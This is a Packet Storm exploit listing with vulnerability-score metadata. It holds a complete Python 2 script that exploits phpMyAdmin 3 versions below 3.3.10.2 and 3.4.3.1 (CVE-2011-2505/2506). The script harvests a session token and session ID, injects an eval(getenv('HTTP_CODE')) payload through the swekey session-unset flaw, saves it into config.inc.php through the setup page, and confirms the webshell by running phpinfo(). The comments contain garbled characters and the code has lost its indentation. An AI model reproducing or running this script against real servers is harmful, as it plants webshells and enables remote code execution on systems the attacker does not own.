phpMyAdmin3 Remote Code Execution

2011-07-0900:00:00
wofeiwo
packetstormsecurity.com
EPSS
0.199
Percentile
96.3%
JSON
`#!/usr/bin/env python  
# coding=utf-8  
# pma3 - phpMyAdmin3 remote code execute exploit  
# Author: wofeiwo<[email protected]>  
# Thx Superhei  
# Tested on: 3.1.1, 3.2.1, 3.4.3  
# CVE: CVE-2011-2505, CVE-2011-2506  
# Date: 2011-07-08  
# Have fun, DO *NOT* USE IT TO DO BAD THING.  
################################################  
  
# Requirements: 1. "config" directory must created&writeable in pma directory.  
# 2. session.auto_start = 1 in php.ini configuration.  
  
  
import os,sys,urllib2,re  
  
def usage(program):  
print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code  
execute exploit"  
print "Usage: %s <PMA_url>" % program  
print "Example: %s http://www.test.com/phpMyAdmin" % program  
sys.exit(0)  
  
def main(args):  
try:  
if len(args) < 2:  
usage(args[0])  
  
if args[1][-1] == "/":  
args[1] = args[1][:-1]  
  
# ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ�  
print "[+] Trying get form token&session_id.."  
content = urllib2.urlopen(args[1]+"/index.php").read()  
r1 = re.findall("token=(\w{32})", content)  
r2 = re.findall("phpMyAdmin=(\w{32,40})", content)  
  
if not r1:  
r1 = re.findall("token\" value=\"(\w{32})\"", content)  
if not r2:  
r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content)  
if len(r1) < 1 or len(r2) < 1:  
print "[-] Cannot find form token and session id...exit."  
sys.exit(-1)  
  
token = r1[0]  
sessionid = r2[0]  
print "[+] Token: %s , SessionID: %s" % (token, sessionid)  
  
# �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ  
print "[+] Trying to insert payload in $_SESSION.."  
uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA"  
url = args[1]+uri  
  
opener = urllib2.build_opener()  
opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;  
pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %  
(sessionid, sessionid)))  
urllib2.install_opener(opener)  
urllib2.urlopen(url)  
  
# ����setup��ȡshell  
print "[+] Trying get webshell.."  
postdata =  
"phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"  
% (sessionid, token)  
url = args[1]+"/setup/config.php"  
  
# print "[+]Postdata: %s" % postdata  
urllib2.urlopen(url, postdata)  
print "[+] All done, pray for your lucky!"  
  
# ���Ĳ����������shell  
url = args[1]+"/config/config.inc.php"  
opener.addheaders.append(('Code', 'phpinfo();'))  
urllib2.install_opener(opener)  
print "[+] Trying connect shell: %s" % url  
result = re.findall("System \</td\>\<td  
class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read())  
if len(result) == 1:  
print "[+] Lucky u! System info: %s" % result[0]  
print "[+] Shellcode is: eval(getenv('HTTP_CODE'));"  
  
else:  
print "[-] Cannot get webshell."  
  
except Exception, e:  
print e  
  
if __name__ == "__main__" : main(sys.argv)  
  
`
EPSS
0.199
Percentile
96.3%
JSON
Related for PACKETSTORM:102941